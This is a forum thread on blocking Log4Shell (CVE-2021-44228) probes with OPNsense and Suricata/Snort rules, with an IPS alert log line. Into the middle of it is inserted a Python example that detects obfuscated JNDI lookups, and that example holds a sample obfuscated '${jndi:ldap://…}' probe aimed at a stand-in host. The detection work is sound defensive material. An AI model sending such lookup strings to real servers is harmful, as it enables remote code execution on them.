log4j vulnerability detection

Started by fwRookie, December 13, 2021, 08:51:01 AM

Is it possible to detect and block the log4j hacking attempts with the OPNsense firewall (or other parts) rules?
I know other firewalls already have rules available to detect and block possible attempts, like https://cloud.google.com/blog/products/identity-security/cloud-armor-waf-rule-to-help-address-apache-log4j-vulnerability


Hi, I am not sure if this will help at all ... google states:

Quote
The Cloud Armor WAF rules use a variety of techniques to detect attempted obfuscations and bypasses within attempted exploits of CVE-2021-44228.

But there are probably just way too many ways to obfuscate that simple string ... good enough to catch the script kiddies.

Best regards,

    Space


December 13, 2021, 04:06:43 PM #3 Last Edit: December 13, 2021, 04:08:49 PM by XeroX
Snort Rules in server-web and server-other detect Log4j as well, as long as traffic is not end-to-end encrypted.

https://www.snort.org/advisories/talos-rules-2021-12-11


Quote from: XeroX on December 13, 2021, 04:06:43 PM
Snort Rules in server-web and server-other detect Log4j as well, as long as traffic is not end-to-end encrypted.

https://www.snort.org/advisories/talos-rules-2021-12-11

Are you using Snort on Opns? I am having issues with Suricata.
DEC4240 – OPNsense Owner

nginx has naxsi which may be used for blocking as well.

Quote from: Julien on December 14, 2021, 03:12:44 PM
Quote from: XeroX on December 13, 2021, 04:06:43 PM
Snort Rules in server-web and server-other detect Log4j as well, as long as traffic is not end-to-end encrypted.

https://www.snort.org/advisories/talos-rules-2021-12-11

Are you using Snort on Opns? I am having issues with Suricata.

No, I'm using Suricata with additional Snort rules. Use 29190. Don't use 3.x rules.

December 19, 2021, 11:59:49 AM #7 Last Edit: December 19, 2021, 12:37:49 PM by dennis_u
Quote from: fwRookie on December 13, 2021, 08:51:01 AM
Is it possible to detect and block the log4j hacking attempts with the OPNsense firewall (or other parts) rules?

Yes, it does. It even blocks my internal research on the vulnerability (e.g. internal requests and CSRF). Update your ET rules and test it.

But a more general question from my side: our OPNsense even blocks the "IPS blocks Log4Shell" logs to our SIEM, since they match the Log4shell patterns:

[Drop] [1:2034672:1] ET EXPLOIT Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M1 (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {UDP} 10.10.x.1:51488 -> 10.10.x.69:516

The interface 10.10.x.1 points to valuable IT assets and I do not want to disable IPS here. Can I whitelist the OPNsense from IPS?
OPNsense consulting, installation, configuration and care by DU Consult
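Two points in this thread are worth seeing in code: Space's remark that the trigger string can be obfuscated in many ways, and dennis_u's observation that the IPS drops its own alert export to the SIEM because the exported record still carries the matched payload. The following Python is an added example, not code from OPNsense, Suricata, the ET ruleset or any poster; the lookup-resolution logic, the EVE-style alert record and the exempt-flow tuple are all constructed for illustration.

```python
import json
import re

# Log4j lookup forms commonly used to hide the literal "jndi" (defender-side view):
#   ${lower:J} -> "j", ${upper:j} -> "J", ${<anything>:-j} -> "j" (default-value syntax)
_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}|\$\{[^${}]*?:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def _resolve(m):
    if m.group(1) == "lower":
        return m.group(2).lower()
    if m.group(1) == "upper":
        return m.group(2).upper()
    return m.group(3)

def normalise(s, max_rounds=10):
    """Resolve innermost lookups until nothing changes (bounded, so nesting cannot loop forever)."""
    for _ in range(max_rounds):
        new = _LOOKUP.sub(_resolve, s)
        if new == s:
            break
        s = new
    return s

def is_log4shell_probe(s):
    """True when the normalised text contains a JNDI lookup, the CVE-2021-44228 trigger."""
    return bool(_JNDI.search(normalise(s)))

# Constructed EVE-style alert export (not a real OPNsense log). The record carries the
# matched request in payload_printable, so the probe string crosses the IPS interface a
# second time inside the log bound for the SIEM, which is why the export itself is dropped.
ALERT_EXPORT = json.dumps({
    "event_type": "alert", "src_ip": "10.10.x.1", "dest_ip": "10.10.x.69", "dest_port": 516,
    "alert": {"signature_id": 2034672},
    "payload_printable": "GET /?q=${${lower:J}ndi:ldap://example.invalid/x} HTTP/1.1",
})

# Flows carrying the sensor's own alert export (src, dst, dst_port); these are exempted
# from content inspection instead of disabling the IPS on the whole interface.
EXEMPT_FLOWS = {("10.10.x.1", "10.10.x.69", 516)}

def verdict(line, src, dst, dport):
    """'exempt' for the sensor's own log export, otherwise 'alert' or 'clean'."""
    if (src, dst, dport) in EXEMPT_FLOWS:
        return "exempt"
    return "alert" if is_log4shell_probe(line) else "clean"
```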

What dennis_u said!  :) Having the same issue.
Running OPNsense through Proxmox
4 x Intel(R) Core(TM) i5-6500 CPU @ 3.20GHz (1 Socket)
24 GB RAM

Quote from: XeroX on December 17, 2021, 01:27:40 AM
Quote from: Julien on December 14, 2021, 03:12:44 PM
Quote from: XeroX on December 13, 2021, 04:06:43 PM
Snort Rules in server-web and server-other detect Log4j as well, as long as traffic is not end-to-end encrypted.

https://www.snort.org/advisories/talos-rules-2021-12-11

Are you using Snort on Opns? I am having issues with Suricata.

No, I'm using Suricata with additional Snort rules. Use 29190. Don't use 3.x rules.

3.x rules, what are those?

Thank you
DEC4240 – OPNsense Owner